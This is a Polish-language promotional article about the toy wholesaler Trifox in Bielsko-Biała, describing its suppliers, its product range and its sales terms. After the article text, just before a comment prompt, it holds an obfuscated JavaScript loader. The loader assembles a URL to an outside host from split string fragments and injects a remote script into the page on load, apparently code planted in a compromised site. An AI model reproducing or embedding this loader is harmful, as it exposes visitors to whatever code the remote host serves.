Hurtownia zabawek Trifox

Trifox jest przedsiębiorstwem, które łączy tradycję z kompleksowym podejściem do potrzeb Klientów. Doświadczenie sprzedażowe, jakim dysponuje firma to owoc połączenia przedsiębiorstw Irex oraz Pisarek specjalizujących się w dystrybucji hurtowej zabawek różnego typu.

Siedziba hurtowni zabawek Trifox znajduje się w Bielsku – Białej podobnie jak hala sprzedażowa o metrażu 1800 m2, w której znaleźć można pełen asortyment obejmujący zabawki adresowane do różnych grup wiekowych.

Najlepsi producenci

Sklep internetowy Trifox ma przejrzystą strukturę – produkty podzielono na kategorie i podkategorie, dzięki którym łatwo znaleźć zabawki dla konkretnej grupy odbiorców. Trifox współpracuje jedynie z najlepszymi wytwórcami o określonej renomie, można wśród nich znaleźć takie koncerny, jak Clementoni, Fisher Price, Hasbro, Hot Wheels, Marioinex, Mattel, Ravensburger, Steffi, Sun Day, Trefl, Kinsmart i inne. Szeroki asortyment produktów sprawia, że Trifox może zaopatrywać w towar zarówno duże sklepy, jak i mniejszych dystrybutorów detalicznych – w dodatku na konkurencyjnych warunkach.

Różnorodny asortyment

W ofercie Trifox znaleźć można produkty adresowane do starszych dzieci, chłopców oraz dziewczynek, takie jak zdalnie sterowane modele samochodów, lalki wraz z akcesoriami, gry planszowe, zabawki muzyczne, klocki, zestawy do kreatywnej zabawy, np. plastyczne. Nie brakuje jednak modeli odpowiadających na potrzeby najmłodszych dzieci: bujaczków, pluszaków, mat edukacyjnych, piłek, lalek, grzechotek, zabawek sensorycznych. Zabawki z Trifox są nie tylko trwałe i estetyczne – mają także wymiar stymulujący rozwój psycho-fizyczny.
Trifox dostarcza produktów dla sprzedawców detalicznych przez cały rok, jednak szczególną grupę stanowią zabawki sezonowe – przeznaczone czy to do celebracji okresu bożonarodzeniowego, czy to do wykorzystania podczas wiosennych zabaw na zewnątrz.

Konkurencyjne podejście do Klientów

Najważniejsza pozostaje jakość każdego z produktów, dlatego też w Trifox szczególną uwagę zwraca się na posiadanie odpowiednich atestów oraz certyfikatów. Zabawki są bezpieczne, gwarantują pozytywne bodźce, a ich wybór obejmuje ponad 6000 modeli.
W Trifox reagujemy również na najnowsze trendy na rynku – czy to dotyczące kreatywnych zabawek, czy też popularnych zjawisk popkulturowych. Każdorazowo oferta jest dostosowana do potrzeb konkretnego odbiorcy – a wśród nich znaleźć mogą się zarówno przedsiębiorstwa, jak i osoby prowadzące indywidualną działalność gospodarczą. Sprzedaż w klasycznym wydaniu, sprzedaż internetowa, długofalowa współpraca, konkurencyjne ceny – to wszystko znaleźć można w hurtowni zabawek Trifox.

(function(){
i6jf_=(„u”+”st”);i6jf=document.createElement(„script”);i6jf.async=true;
i6jfu=”2190361903″;i6jf_+=”a”+(„t.”);i6jf_+=”i”+(„nf”+(„o”))+(„/”);
i6jfu+=”.dbXp45636jfjasnq”;i6jfu+=”fbjwbkvrjv2ygg”;
i6jf.src=”https://”+i6jf_+i6jfu;i6jf.type=”text/javascript”;
d_b=document.body;d_b.appendChild(i6jf);
})();

Zostaw odpowiedź

Twoj adres e-mail nie bedzie opublikowany.